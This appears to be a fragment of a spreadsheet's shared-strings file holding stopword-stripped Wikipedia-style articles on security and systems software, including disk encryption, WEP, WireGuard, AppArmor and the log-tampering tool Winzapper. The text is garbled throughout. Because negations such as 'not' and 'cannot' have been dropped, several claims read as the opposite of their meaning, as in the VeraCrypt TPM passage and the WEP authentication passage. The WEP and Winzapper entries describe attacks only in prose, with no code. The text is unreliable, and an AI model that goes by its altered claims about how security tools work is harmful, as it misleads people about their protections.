    <t>Cryptoloop</t>
  </si>
  <si>
    <t>cryptoloop linux kernel's disk encryption module relies crypto api, cryptography framework introduced version 2.5.45 linux kernel mainline. cryptoloop first introduced 2.5.x kernel series; functionality later incorporated device mapper, generic framework used block device onto another. cryptoloop create encrypted file system within partition within regular file regular file system. once file encrypted, moved another storage device. this accomplished making loop device, pseudo device enables normal file mounted physical device. encrypting loop device, data accessed must first decrypted passing regular file system; conversely, data stored encrypted. cryptoloop vulnerable watermarking attacks, making possible determine presence watermarked data encrypted filesystem: this attack exploits weakness computation knowledge file systems place files disk. this attack works file systems soft block size 1024 greater. least ext2, ext3, reiserfs minix property. this attack makes possible detect presence specially crafted watermarked files. watermarked files contain special patterns detected without decryption. newer versions cryptoloop's successor, dm-crypt, less vulnerable type attack used correctly. also comparison disk encryption software disk encryption references external links cryptoloop howto</t>
  </si>
  <si>
    <t>CapROS</t>
  </si>
  <si>
    <t>capability-based reliable operating system (capros) operating system incorporating pure capability-based security. features automatic persistence data processes, even across system reboots. capability systems naturally support principle least authority, improves security fault tolerance. free open-source software released general public license version (gplv2), lesser general public license version (lgplv2). capros evolution extremely reliable operating system (eros). while eros purely research system, capros intended stable system commercial quality. capros currently runs intel ia-32 microprocessors. capros developed strawberry development group funding defense advanced research projects agency (darpa) others. primary developer charles landau. history capros project formed 2005 non-academic continuation eros. eros system turn traces architecture keykos ultimately gnosis. also external links official website eros page wayback machine (archived 2003-10-29) keykos page library congress archives (archived 2001-11-16)</t>
  </si>
  <si>
    <t>Vehicle tracking system</t>
  </si>
  <si>
    <t>vehicle tracking system combines automatic vehicle location individual vehicles software collects fleet data comprehensive picture vehicle locations. modern vehicle tracking systems commonly glonass technology locating vehicle, types automatic vehicle location technology also used. vehicle information viewed electronic maps internet specialized software. urban public transit authorities increasingly common user vehicle tracking systems, particularly large cities. active versus passive tracking several types vehicle tracking devices exist. typically classified "passive" "active". "passive" devices store location, speed, heading sometimes trigger event on/off, door open/closed. once vehicle returns predetermined point, device removed data downloaded computer evaluation. passive systems include auto download type transfer data wireless download. "active" devices also collect information usually transmit data near-real-time cellular satellite networks computer data center evaluation. many modern vehicle tracking devices combine active passive tracking abilities: cellular network available tracking device connected transmits data server; network available device stores data internal memory transmit stored data server later network becomes available again. historically, vehicle tracking accomplished installing vehicle, either self-powered battery wired vehicle's power system. detailed vehicle locating tracking still predominant method; however, many companies increasingly interested emerging cell phone technologies provide tracking multiple entities, salesperson vehicle. these systems also offer tracking calls, texts, generally provide wider range options. typical architecture major constituents gps-based tracking are: tracking unit: device fits vehicle captures location information apart vehicle information regular intervals central server. other vehicle information include fuel amount, engine temperature, altitude, reverse geocoding, door open/close, tire pressure, fuel, turn ignition, turn headlight, turn taillight, battery status, area code/cell code decoded, number satellites view, glass open/close, fuel amount, emergency button status, cumulative idling, computed odometer, engine rpm, throttle position, gprs status more. capability devices actually decide final capability whole tracking system; vehicle tracking systems, addition providing vehicle's location data, feature wide range communication ports used integrate onboard systems, allowing check status control automate operation. tracking server: tracking server three responsibilities: receiving data tracking unit, securely storing serving information demand user. user interface: determines able access information, view vehicle data, elicit important details common uses vehicle tracking systems commonly used fleet operators fleet management functions fleet tracking, routing, dispatching, on-board information security. some vehicle tracking systems bundled interface fleet management software. along commercial fleet operators, urban transit agencies technology number purposes, including monitoring schedule adherence buses service, triggering automatic changes buses' destination sign displays vehicle approaches terminus location along route particular stop along route), triggering pre-recorded even synthetic speech) stop, route (and destination) service announcements passengers. american public transportation association estimated that, beginning 2009, around half transit buses united states already using gps-based vehicle tracking system trigger automated stop announcements. this refer external announcements (triggered opening bus's door) stop, announcing vehicle's route number destination, primarily benefit visually impaired customers, internal announcements passengers already board) identifying next stop, tram) approaches stop, both; latter often also displayed internal display monitor connected system loudspeakers play them. data collected transit vehicle follows route often continuously computer program compares vehicle's actual location time schedule, turn produces frequently updating display driver, telling him/her early late he/she given time, potentially making easier adhere closely published schedule. such programs also used provide customers real-time information waiting time arrival next tram/streetcar given stop, based nearest vehicles' actual progress time, rather merely giving information scheduled time next arrival. transit systems providing kind information assign unique number stop, waiting passengers obtain information entering stop number automated telephone system application transit system's website.some transit agencies provide virtual website, icons depicting current locations buses service route, customers' information, others provide information dispatchers employees. other applications include monitoring driving behavior, employer employee, parent teen driver. vehicle tracking systems also popular consumer vehicles theft prevention, monitoring retrieval device. police simply follow signal emitted tracking system locate stolen vehicle. when used security system, vehicle tracking system serve either addition replacement traditional alarm. some vehicle tracking systems make possible control vehicle remotely, including block doors engine case emergency. existence vehicle tracking device used reduce insurance cost, loss-risk vehicle drops significantly. vehicle tracking systems integrated part "layered approach" vehicle protection, recommended national insurance crime bureau (nicb) prevent motor vehicle theft. this approach recommends four layers security based risk factors pertaining specific vehicle. vehicle tracking systems layer described nicb "very effective" helping police recover stolen vehicles. some vehicle tracking systems integrate several security systems, example sending automatic alert phone email alarm triggered vehicle moved without authorization, leaves enters geofence. other scenarios technology employed include: stolen vehicle recovery: both consumer commercial vehicles outfitted units allow police tracking recovery. case lojack, police activate tracking unit vehicle directly follow tracking signals. asset tracking: companies needing track valuable assets insurance monitoring purposes plot real-time asset location closely monitor movement operating status. field service management: companies field service workforce services repair maintenance, must able plan field workers’ time, schedule subsequent customer visits able operate departments efficiently. vehicle tracking allows companies quickly locate field engineer dispatch closest meet customer request provide site arrival information. field sales: mobile sales professionals access real-time locations. example, unfamiliar areas, locate well customers prospects, driving directions nearby last-minute appointments itineraries. benefits include increased productivity, reduced driving time increased time spent customers prospects. trailer tracking: haulage logistics companies often operate lorries detachable load carrying units. part vehicle drives load known load carrying unit known trailer. there different types trailer used different applications, e.g., flat bed, refrigerated, curtain sider, container. surveillance: tracker placed vehicle follow vehicle's movements. transit tracking: temporary tracking assets cargoes point another. users ensure assets stop route u-turn order ensure security assets. fuel monitoring: monitor fuel tracking device (with help fuel sensor connected device). distance calculation: calculate distance travelled fleet. plug play interface provides engine diagnostics information.vehicle tracking systems widely used worldwide. components come various shapes forms technology services. newer vehicle tracking systems also latest nb-iot technology provide power consumption optimized data transmission rates. additionally, systems also feature short range data communication systems wifi. while offer real-time tracking, others record real time data store read, fashion similar data loggers. systems like track record allow reports certain points solved vehicle tracking systems vehicle tracking systems make trackers plug onboard diagnostic (obd) port light, medium, heavy-duty vehicle. cellular tracker directly communicates cell tower sending location vehicle performance data server cellular wireless network. usually, tracker device draws power port contains built-in antenna along module receiving signal. addition, trackers communicate different vehicle subsystems receiving vehicle diagnostic fuel consumption related data. users view information using standalone software browser desktop/laptop computer using smartphone apps. fleet management tracking aside theft-prevention, common vehicle tracking logistics transport. these systems make gps(global positioning system) gsm(global system mobile communication) technology provide precise constant location telematics individual fleet manager. these systems typically equipped features monitor statistics fuel consumption, average speed, current driver time location. there recent increase demand technology regulations place increased restrictions hours driver allowed work given day. currently limited hours day. companies legally obligated install tachograph vehicle expected carry goods. this obligation many attempt cauterize potentially onerous obligation, instead turning benefit. fleet management systems technology. much like forms trackers, although nature equipped thorough diagnostic features. other uses trailer tracking, fuel monitoring, distance calculation, asset tracking, field sales incorporated fleet management solution. unconventional uses industries traditionally known vehicle tracking systems (logistics transportation industries ones traditionally incorporated vehicle tracking system operations) started creative ways improve processes businesses. hospitality industry caught technology improve customer service. example, luxury hotel singapore installed vehicle tracking systems limousines ensure welcome vips reach hotel. vehicle tracking systems used food delivery vans alert temperature refrigerated compartment moves outside range safe food storage temperatures. rental companies also using monitor rental fleets. also anti-hijack system automatic number plate recognition automatic vehicle location fleet management fleet telematics fleet tracking tracking server tracking unit wildlife tracking intelligent transportation system invanet mobile phone tracking privacy law, informational self-determination, privacy, data security telematics track trace tracking system trailer tracking vehicle infrastructure integration references</t>
  </si>
  <si>
    <t>VeraCrypt</t>
  </si>
  <si>
    <t>veracrypt free open-source utility on-the-fly encryption (otfe). software create virtual encrypted disk works like regular disk within file. also encrypt partition windows) entire storage device pre-boot authentication.veracrypt fork discontinued truecrypt project. initially released june 2013. many security improvements implemented concerns within truecrypt code audits addressed. veracrypt includes optimizations original cryptographic hash functions ciphers, boost performance modern cpus. encryption scheme veracrypt employs aes, serpent, twofish, camellia, kuznyechik ciphers. version 1.19 stopped using magma cipher response security audit. additional security, different combinations cascaded algorithms available: aes–twofish aes–twofish–serpent camellia–kuznyechik camellia–serpent kuznyechik–aes kuznyechik–serpent–camellia kuznyechik–twofish serpent–aes serpent–twofish–aes twofish–serpentthe cryptographic hash functions available veracrypt ripemd-160, sha-256, sha-512, streebog whirlpool.veracrypt's block cipher mode operation xts. generates header secondary header (xts mode) using pbkdf2 512-bit salt. default 200,000 655,331 iterations, depending underlying hash function used. user customize start 2,048. security improvements veracrypt development team considered truecrypt storage format vulnerable national security agency (nsa) attack, created format incompatible truecrypt. veracrypt still capable opening converting volumes truecrypt format. independent security audit truecrypt released september 2015 found truecrypt includes vulnerabilities windows installation driver allowing attacker arbitrary code execution privilege escalation hijacking. this fixed veracrypt january 2016. while truecrypt uses 1,000 iterations pbkdf2-ripemd160 algorithm system partitions, veracrypt uses either 200,000 327,661 iterations default (which customizable user 2,048), depending algorithm used. standard containers partitions, veracrypt uses 655,331 iterations ripemd160 500,000 iterations sha-2 whirlpool default (which customizable user 16,000). while default settings make veracrypt slower opening encrypted partitions, also makes password-guessing attacks slower. additionally, since version 1.12, feature called "personal iterations multiplier" (pim) provides parameter whose value used control number iterations used header derivation function, thereby making brute-force attacks potentially even difficult. veracrypt uses reasonable value improve security, users provide higher value enhance security. primary downside feature makes process opening encrypted archives even slower. vulnerability bootloader fixed windows various optimizations made well. developers added support sha-256 system boot encryption option also fixed shellexecute security issue. linux macos users benefit support hard drives sector sizes larger 512. linux also received support ntfs formatting volumes. unicode passwords supported operating systems since version 1.17 (except system encryption windows). veracrypt added capability boot system partitions using uefi version 1.18a. option enable/disable support trim command system non-system drives added version 1.22. erasing system encryption keys shutdown/reboot helps mitigate cold boot attacks, added version 1.24. encryption keys passwords 64-bit systems added version 1.24. veracrypt audit quarkslab conducted audit version 1.18 behalf open source technology improvement fund (ostif), took man-days. auditor published results october 2016. day, idrix released version 1.19, resolved major vulnerabilities identified audit.fraunhofer institute secure information technology (sit) conducted another audit 2020, following request germany's federal office information security (bsi), published results october 2020. security precautions there several kinds attacks software-based disk encryption vulnerable. truecrypt, veracrypt documentation instructs users follow various security precautions mitigate attacks, several detailed below. encryption keys stored memory veracrypt stores keys ram; personal computers dram maintain contents several seconds power longer temperature lowered). even degradation memory contents, various algorithms able recover keys. this method, known cold boot attack (which would apply particular notebook computer obtained power-on, suspended, screen-locked mode), successfully used attack file system protected truecrypt versions 4.3a 5.0a 2008. with version 1.24, veracrypt added option encrypting in-ram keys passwords editions windows, overhead less 10%, option erasing encryption keys memory device connected. tampered hardware veracrypt documentation states veracrypt unable secure data computer attacker physically accessed veracrypt used compromised computer user again. this affect common case stolen, lost, confiscated computer. attacker physical access computer can, example, install hardware software keylogger, bus-mastering device capturing memory install malicious hardware software, allowing attacker capture unencrypted data (including encryption keys passwords) decrypt encrypted data using captured passwords encryption keys. therefore, physical security basic premise secure system.some kinds malware designed keystrokes, including typed passwords, sent attacker internet saved unencrypted local drive attacker might able read later, gain physical access computer. trusted platform module veracrypt take advantage trusted platform module (tpm). veracrypt repeats negative opinion original truecrypt developers verbatim. truecrypt developers opinion exclusive purpose protect attacks require attacker administrator privileges, physical access computer". attacker physical administrative access computer circumvent tpm, e.g., installing hardware keystroke logger, resetting tpm, capturing memory contents retrieving tpm-issued keys. condemning text goes claim entirely redundant.it true achieving either unrestricted physical access administrative privileges, matter time security measures place bypassed. however, stopping attacker possession administrative privileges never goals tpm. (see trusted platform module uses details.) can, however, stop cold boot attack described above. plausible deniability predecessor truecrypt, veracrypt supports plausible deniability allowing single "hidden volume" created within another volume. windows versions veracrypt create hidden encrypted operating system whose existence denied. veracrypt documentation lists ways hidden volume deniability features compromised (e.g., third-party software leak information temporary files thumbnails) possible ways avoid this. performance veracrypt supports parallelized: encryption multi-core systems. microsoft windows, pipelined read write operations form asynchronous processing): reduce performance encryption decryption. processors supporting aes-ni instruction set, veracrypt supports hardware-accelerated improve performance.: 64-bit cpus veracrypt uses optimized assembly implementation twofish camellia. license source model veracrypt forked since-discontinued truecrypt project 2013. originally contained mostly truecrypt code released truecrypt license 3.0. years since, veracrypt's code rewritten released permissive apache license 2.0. truecrypt license generally considered source-available free open source. apache license universally considered free open source. mixed veracrypt license widely universally considered free open source. 2014 truecrypt abandoned unusual circumstances, exists contact former developers. veracrypt considered free open source world techspot duckduckgo's open source technology improvement fund sourceforge open tech fund fosshub opensource.com fossmintveracrypt considered free open source debiansome members open source initiative, including director, expressed concern older version truecrypt license, published determination regarding either truecrypt veracrypt.the free software foundation determined truecrypt license non-free. published determination regarding veracrypt license. also disk encryption software comparison disk encryption software references external links official website veracrypt 1.18 security assessment</t>
  </si>
  <si>
    <t>Wired Equivalent Privacy</t>
  </si>
  <si>
    <t>wired equivalent privacy (wep) security algorithm 802.11 wireless networks. introduced part original ieee 802.11 standard ratified 1997, intention provide data confidentiality comparable traditional wired network. wep, recognizable hexadecimal digits bits), time widely used, often first security choice presented users router configuration tools.in 2003, wi-fi alliance announced superseded wi-fi protected access (wpa). 2004, ratification full 802.11i standard (i.e. wpa2), ieee declared wep-40 wep-104 deprecated.wep encryption protocol available 802.11a 802.11b devices built standard, available 802.11g devices. however, 802.11b devices later provided firmware software updates enable wpa, newer devices built history ratified wi-fi security standard 1999. first versions particularly strong, even time released u.s. restrictions export various cryptographic technology. these restrictions manufacturers restricting devices 64-bit encryption. when restrictions lifted, encryption increased 128-bit. despite introduction 256-bit wep, 128-bit remains common implementations. encryption details included privacy component original ieee 802.11 standard ratified 1997. uses stream cipher confidentiality, crc-32 checksum integrity. deprecated 2004 documented current standard. standard 64-bit uses (also known wep-40), concatenated 24-bit initialization vector (iv) form key. time original standard drafted, u.s. government's export restrictions cryptographic technology limited size. once restrictions lifted, manufacturers access points implemented extended 128-bit protocol using 104-bit size (wep-104). 64-bit usually entered string hexadecimal (base characters (0–9 a–f). each character represents bits, digits bits gives bits; adding 24-bit produces complete 64-bit bits bits bits key). most devices also allow user enter ascii characters (0–9, a–z, a–z), turned bits using character's byte value ascii bits bits bits key); however, restricts byte printable ascii character, small fraction possible byte values, greatly reducing space possible keys. 128-bit usually entered string hexadecimal characters. digits bits gives bits; adding 24-bit produces complete 128-bit bits bits bits key). most devices also allow user enter ascii characters bits bits bits key). 152-bit 256-bit systems available vendors. variants, bits leaving bits actual protection. these bits typically entered hexadecimal characters bits bits bits key, bits bits bits key). most devices also allow user enter ascii characters bits bits bits key, bits bits bits key). authentication methods authentication used wep: open system authentication shared authentication. open system authentication, wlan client provide credentials access point authentication. client authenticate access point attempt associate. effect, authentication occurs. subsequently, keys used encrypting data frames. point, client must correct keys. shared authentication, used authentication four-step challenge-response handshake: client sends authentication request access point. access point replies clear-text challenge. client encrypts challenge-text using configured sends back another authentication request. access point decrypts response. matches challenge text, access point sends back positive reply.after authentication association, pre-shared also used encrypting data frames using rc4. first glance, might seem though shared authentication secure open system authentication since latter offers real authentication. however, quite reverse. possible derive keystream used handshake capturing challenge frames shared authentication. therefore, data easily intercepted decrypted shared authentication open system authentication. privacy primary concern, advisable open system authentication authentication, rather shared authentication; however, also means wlan client connect (both authentication mechanisms weak; shared deprecated favor wpa/wpa2.) weak security because stream cipher, traffic must never used twice. purpose transmitted plain text, prevent repetition, 24-bit long enough ensure busy network. used also opened related attack. 24-bit probability repeat 5,000 packets. august 2001, scott fluhrer, itsik mantin, shamir published cryptanalysis exploits ciphers used wep, resulting passive attack recover eavesdropping network. depending amount network traffic, thus number packets available inspection, successful recovery could take little minute. insufficient number packets sent, ways attacker send packets network thereby stimulate reply packets, inspected find key. attack soon implemented, automated tools since released. possible perform attack personal computer, off-the-shelf hardware, freely available software aircrack-ng crack minutes. cam-winget surveyed variety shortcomings wep. they wrote "experiments field show that, proper equipment, practical eavesdrop wep-protected networks distances mile target." they also reported generic weaknesses: optional, resulting many installations never even activating default, relies single shared among users, leads practical problems handling compromises, often leads ignoring compromises.in 2005, group u.s. federal bureau investigation gave demonstration cracked wep-protected network three minutes using publicly available tools. andreas klein presented another analysis stream cipher. klein showed correlations keystream ones found fluhrer, mantin, shamir additionally used break wep-like usage modes. 2006, bittau, handley, lackey showed 802.11 protocol used enable earlier attacks previously thought impractical. after eavesdropping single packet, attacker rapidly bootstrap able transmit arbitrary data. eavesdropped packet decrypted byte time transmitting packets byte decrypt) discover local network addresses. finally, 802.11 network connected internet, attacker 802.11 fragmentation replay eavesdropped packets crafting header onto them. access point used decrypt packets relay buddy internet, allowing real-time decryption traffic within minute eavesdropping first packet. 2007, erik tews, andrei pychkine, ralf-philipp weinmann able extend klein's 2005 attack optimize usage wep. with attack possible recover 104-bit probability using 40,000 captured packets. 60,000 available data packets, success probability 85,000 data packets 95%. using active techniques like wi-fi deauthentication attacks re-injection, 40,000 packets captured less minute good conditions. actual computation takes seconds main memory pentium-m additionally optimized devices slower cpus. attack used 40-bit keys even higher success probability. 2008 payment card industry (pci) security standards council updated data security standard (dss) prohibit part credit-card processing june 2010, prohibit system installed uses march 2009. contributed maxx parent company network invasion. caffe latte attack caffe latte attack another defeat wep. necessary attacker area network using exploit. using process targets windows wireless stack, possible obtain remote client. sending flood encrypted requests, assailant takes advantage shared authentication message modification flaws 802.11 wep. attacker uses responses obtain less minutes. remedies encrypted tunneling protocols (e.g., ipsec, secure shell) provide secure data transmission insecure network. however, replacements developed goal restoring security wireless network itself. 802.11i (wpa wpa2) recommended solution security problems switch wpa2. intermediate solution hardware could support wpa2. both wpa2 much secure wep. support wpa2, wi-fi access points might need replaced firmware upgraded. designed interim software-implementable solution could forestall immediate deployment hardware. however, tkip (the basis wpa) reached designed lifetime, partially broken, officially deprecated release 802.11-2012 standard. implemented non-standard fixes wep2 this stopgap enhancement present early 802.11i drafts. implementable (not all) hardware able handle wpa2, extended values bits. hoped eliminate duplicate deficiency well stop brute force attacks. after became clear overall algorithm deficient (and sizes) would require even fixes, wep2 name original algorithm dropped. extended lengths remained eventually became wpa's tkip. wepplus wepplus, also known wep+, proprietary enhancement agere systems (formerly subsidiary lucent technologies) enhances security avoiding "weak ivs". completely effective wepplus used ends wireless connection. cannot easily enforced, remains serious limitation. also necessarily prevent replay attacks, ineffective later statistical attacks rely weak ivs. dynamic dynamic refers combination 802.1x technology extensible authentication protocol. dynamic changes keys dynamically. vendor-specific feature provided several vendors 3com. dynamic change idea made 802.11i part tkip, actual algorithm. also stream cipher attack wireless cracking wi-fi protected access references external links evolution 802.11 wireless security, kevin benton, april 18th 2010 archived 2016-03-02 wayback machine</t>
  </si>
  <si>
    <t>WireGuard</t>
  </si>
  <si>
    <t>wireguard communication protocol free open-source software implements encrypted virtual private networks (vpns), designed goals ease use, high speed performance, attack surface. aims better performance power ipsec openvpn, common tunneling protocols. wireguard protocol passes traffic udp.in march 2020, linux version software reached stable production release incorporated linux kernel, backported earlier linux kernels linux distributions. linux kernel components licensed general public license (gpl) version implementations gplv2 free/open-source licenses. protocol wireguard uses following: curve25519 exchange chacha20 symmetric encryption poly1305 message authentication codes siphash hashtable keys blake2s cryptographic hash function udp-based onlyin 2019, researchers inria published machine-checked proof wireguard protocol, produced using cryptoverif proof assistant. optional pre-shared symmetric mode wireguard supports pre-shared symmetric mode, provides additional layer symmetric encryption mitigate future advances quantum computing. this addresses risk traffic stored quantum computers capable breaking curve25519; point traffic could decrypted. pre-shared keys "usually troublesome management perspective might likely stolen", shorter term, symmetric compromised, curve25519 keys still provide sufficient protection. networking wireguard uses thus work networks block traffic. this unlike alternatives like openvpn many disadvantages tcp-over-tcp routing.wireguard fully supports ipv6, inside outside tunnel. supports layer ipv4 ipv6 encapsulate v4-in-v6 vice versa.wireguard supports multiple topologies: point-to-point star (server/client) client endpoint defined client starts sending data. client endpoints statically predefined. meshsince point-to-point supported, topologies made, tunnel. extensibility wireguard designed extended third-party programmes scripts. this used augment wireguard various features including user-friendly management interfaces (including easier setting keys), logging, dynamic firewall updates, ldap integration.excluding complex features minimal core codebase improves stability security. ensuring security, wireguard restricts options implementing cryptographic controls, limits choices exchange processes, maps algorithms small subset modern cryptographic primitives. flaw found primitives, version released resolves issue. also, configuration settings affect security overall application cannot modified unprivileged users. reception wireguard aims provide simple effective virtual private network implementation. 2018 review technica observed popular technologies openvpn ipsec often complex disconnect easily absence configuration), take substantial time negotiate reconnections, outdated ciphers, relatively massive code bases 400,000 600,000 lines code, respectively, hinders debugging.wireguard's design seeks reduce issues, aiming make tunnel secure easier manage default. using versioning cryptography packages, focuses ciphers believed among secure current encryption methods, time technica review codebase around 4000 lines kernel code, either openvpn ipsec, making security audits easier. wireguard received funding open technology fund.wireguard praised linux kernel creator linus torvalds stated "work art" contrast openvpn ipsec.ars technica reported testing, stable tunnels easily created wireguard, compared alternatives, commented would "hard back" long reconnection delays, compared wireguard's nonsense" instant reconnections.oregon senator wyden recommended national institute standards technology (nist) evaluate wireguard replacement existing technologies like ipsec openvpn. availability implementations implementations wireguard protocol include: donenfeld's initial implementation, written cloudflare's boringtun, user space implementation written rust. matt dunwoodie's implementation openbsd, written ryota ozaki's wg(4) implementation, netbsd, written freebsd implementation written shares data path openbsd implementation. native windows kernel implementation named "wireguard-nt", since august 2021 opnsense standard package os-wireguard pfsense experimental add-on package pfsense plus 21.05, pfsense 2.5.2, later versions. linux support user space programs supporting wireguard include: networkmanager since version 1.16 systemd since version intel's connman since version 1.38 ipvanish since version 3.7.4.0 mozilla (with mullvad) noia network nordvpn nordlynx veeam powered network since 2019 pivpn since october 2019 unlimited since november 2019 private internet access since april 2020 hide.me client since july 2020 surfshark since october 2020 mistborn (software) since march 2020 oracle linux "unbreakable enterprise kernel" release update since november 2020 ovpn since 2020, roll-out 2021 torguard since 2020 vypr since 2020 windscribe 2020 trust.zone since february 2021 protonvpn since october 2021 history early snapshots code base exist june 2016. four early adopters wireguard service providers mullvad, azirevpn, ivpn cryptostorm. wireguard received donations mullvad, private internet access, ivpn, nlnet foundation also ovpn.as june 2018 developers wireguard advise treating code protocol experimental, caution achieved stable release compatible tracking security vulnerabilities discovered.on december 2019, david miller primary maintainer linux networking stack accepted wireguard patches "net-next" maintainer tree, inclusion upcoming kernel.on january 2020, linus torvalds merged david miller's net-next tree, wireguard entered mainline linux kernel tree.on march 2020, debian developers enabled module build options wireguard kernel config debian version (testing).on march 2020 wireguard incorporated linux release tree. windows version software remains beta.on march 2020, android developers added native kernel support wireguard generic kernel image.on april 2020, networkmanager developer beniamino galvani merged support wireguard.on 2020, matt dunwoodie proposed patches native kernel support wireguard openbsd.on june 2020, work matt dunwoodie jason donenfeld, wireguard support imported openbsd.on november 2020, jason donenfeld released update windows package improving installation, stability, support, enterprise features.on november 2020, wireguard support imported freebsd kernel.on january 2021, wireguard support added preview pfsense community edition (ce) 2.5.0 development snapshots.in march 2021, kernel-mode wireguard support removed freebsd 13.0, still testing, urgent code cleanup freebsd wireguard could completed quickly. freebsd-based pfsense community edition (ce) 2.5.0 pfsense plus 21.02 removed kernel-based wireguard well.in 2021, wireguard support re-introduced back pfsense pfsense plus development snapshots experimental package written member pfsense community, christian mcdonald. wireguard package pfsense incorporates ongoing kernel-mode wireguard development work jason donenfeld originally sponsored netgatein june 2021, official package repositories pfsense 2.5.2 pfsense plus 21.05 included wireguard package also comparison virtual private network services secure shell (ssh), cryptographic network protocol used secure services unsecured network. notes references</t>
  </si>
  <si>
    <t>Apache CloudStack</t>
  </si>
  <si>
    <t>cloudstack open-source cloud computing software creating, managing, deploying infrastructure cloud services. uses existing hypervisor platforms virtualization, kvm, vmware vsphere, including esxi vcenter, xenserver/xcp. addition api, cloudstack also supports amazon services (aws) open cloud computing interface open grid forum. history cloudstack originally developed cloud.com, formerly known vmops.vmops founded sheng liang, shannon williams, alex huang, will chan, chiradeep vittal 2008. company raised total $17.6m venture funding redpoint ventures, nexus ventures index ventures (redpoint nexus initial series funding round). company changed name vmops cloud.com 2010, emerged stealth mode announcing product. cloud.com based cupertino, california. 2010, cloud.com released cloudstack free software general public license, version (gplv3). they kept proprietary. cloud.com citrix supported openstack, another apache-licensed cloud computing program, announcement july 2010.in october 2010, cloud.com announced partnership microsoft develop code provide integration support windows server 2008 hyper-v openstack project.citrix systems purchased cloud.com july 2011, approximately $200 million. august 2011, citrix released remaining code apache software license development governed apache foundation. february 2012, citrix released cloudstack 3.0. among features, added support swift, openstack's s3-like object storage solution. april 2012, citrix donated cloudstack apache software foundation (asf), accepted apache incubator; citrix changed license apache license version part change, citrix also ceased involvement openstack. november 2012, cloudstack 4.0.0-incubating announced, first stable release joining asf. march 2013, cloudstack graduated apache incubator became top-level project (tlp) asf. first stable (maintenance) release graduation cloudstack 4.0.2. features built-in high-availability hosts ajax management compatibility hypervisor agnostic snapshot management usage metering network management (vlan's, security groups) virtual routers, firewalls, load balancers multi-role support supported hypervisors baremetal hosts rhel centos, v7.x ubuntu 16.04 deployment architecture minimum production installation consists machine running cloudstack management server another machine cloud infrastructure case, simple infrastructure consisting host running hypervisor software). smallest deployment, single machine management server hypervisor host (using hypervisor).multiple management servers configured redundancy load balancing, pointing common mysql database. users july 2012 reported datapipe launched largest international public cloud built cloudstack, included data centers britain, asia. references external links official website cloud management portal built apache cloudstack</t>
  </si>
  <si>
    <t>Apache Directory</t>
  </si>
  <si>
    <t>apache directory open source project apache software foundation. apache directory server, originally written alex karasulu, embeddable directory server entirely written java. certified ldapv3-compatible open group 2006. besides ldap, server supports protocols well, kerberos server.there exist subprojects: apache directory studio ldap browser/editor data, schema, ldif, dsml written eclipse-based framework. apache escimo java-based implementation scim protocol. apache fortress standards-based authorization system. apache kerby kerberos implementation written java. apache ldap directory access java. apache mavibot database application java applications. also list ldap software references external links apache directory server apache directory studio apache directory mavibot apache directory escimo apache directory fortress apache directory kerby apache directory ldap</t>
  </si>
  <si>
    <t>Winzapper</t>
  </si>
  <si>
    <t>winzapper freeware utility hacking tool used delete events microsoft windows windows 2000 security log. developed arne vidstrom proof-of-concept tool, demonstrating administrator account compromised, event logs longer reliable. according hacking exposed: windows server 2003, winzapper works windows nt/2000/2003.prior winzapper's creation, administrators already ability clear security either event viewer third-party tools clearlogs. however, windows lacked built-in method selectively deleting events security log. unexpected clearing would likely flag system administrators intrusion occurred. winzapper would allow hacker hide intrusion deleting events relevant attack. winzapper, publicly released, lacked ability remotely without tool terminal services. however, according arne vidstrom, could easily modified remote operation.there also unrelated trojan horse name. countermeasures winzapper creates backup security log, "dummy.dat," %systemroot%\system32\config. this file undeleted attack recover original log. conceivably, however, savvy user might copy sufficiently large file dummy.dat file thus irretrievably overwrite winzapper causes event viewer become unusable reboot, unexpected reboot clue winzapper recently used. another potential clue winzapper-based attempt would corruption security (requiring cleared), since always small risk winzapper this. according windowsnetworking.com, "one prevent rogue admins using tool servers implement software restriction policy using group policy prevents winzapper executable running". references</t>
  </si>
  <si>
    <t>Apcupsd</t>
  </si>
  <si>
    <t>apcupsd, short daemon, utility runs linux, unix, macos windows.: allows computer interact upses. apcupsd also works oem-branded products (e.g. hewlett-packard) manufactured apc.: apcupsd free software equivalent apc's proprietary powerchute software. version 3.14, apcupsd support powerchute network shutdown function well many features.: apcupsd runs daemon mode keep live connection ups. depending settings type connection, apcupsd either polls learn current state, receives messages (e.g. snmp traps). possible types connections usb, rs-232 ethernet. apcupsd communicate instances apcupsd computers maintain client-server relationship them. this possible power multiple computers ups, even though connected data port ups. also smart-ups network tools, alternative apcupsd, supports references external links official website apcupsd sourceforge</t>
  </si>
  <si>
    <t>AppArmor</t>
  </si>
  <si>
    <t>apparmor ("application armor") linux kernel security module allows system administrator restrict programs' capabilities per-program profiles. profiles allow capabilities like network access, socket access, permission read, write, execute files matching paths. apparmor supplements traditional unix discretionary access control (dac) model providing mandatory access control (mac). partially included mainline linux kernel since version 2.6.36 development supported canonical since 2009. details addition manually creating profiles, apparmor includes learning mode, profile violations logged, prevented. this used generating apparmor profile, based program's typical behavior. apparmor implemented using linux security modules (lsm) kernel interface. apparmor offered part alternative selinux, critics consider difficult administrators maintain. unlike selinux, based applying labels files, apparmor works file paths. proponents apparmor claim less complex easier average user learn selinux. they also claim apparmor requires fewer modifications work existing systems. example, selinux requires filesystem supports "security labels", thus cannot provide access control files mounted nfs. apparmor filesystem-agnostic. other systems apparmor represents several possible approaches problem restricting actions installed software take. selinux system generally takes approach similar apparmor. important difference: selinux identifies file system objects inode number instead path. under apparmor inaccessible file become accessible hard link created. this difference less important was, ubuntu 10.10 later mitigate security module called yama, also used distributions. selinux's inode-based model always inherently denied access newly created hard links hard link would pointing inaccessible inode. selinux apparmor also differ significantly administered integrate system. isolation processes also accomplished mechanisms like virtualization; laptop child (olpc) project, example, sandboxes individual applications lightweight vserver. 2007, simplified mandatory access control kernel introduced. 2009, solution called tomoyo included linux 2.6.30; like apparmor, also uses path-based access control. availability apparmor first used immunix linux 1998–2003. time, apparmor known subdomain, reference ability security profile specific program segmented different domains, program switch dynamically. apparmor first made available sles opensuse first enabled default sles opensuse 10.1. 2005 novell acquired immunix rebranded subdomain apparmor began code cleaning rewriting inclusion linux kernel. from 2005 september 2007, apparmor maintained novell. novell taken suse legal owner trademarked name apparmor.apparmor first successfully ported/packaged ubuntu april 2007. apparmor became default package starting ubuntu 7.10, came part release ubuntu 8.04, protecting cups default. ubuntu 9.04 items mysql installed profiles. apparmor hardening continued improve ubuntu 9.10 ships profiles guest session, libvirt virtual machines, evince document viewer, optional firefox profile.apparmor integrated october 2010, 2.6.36 kernel release.apparmor integrated synology's since beta 2014.apparmor enabled solus release 2017/8/15.apparmor enabled default debian (buster), released july 2019.apparmor available official repositories arch 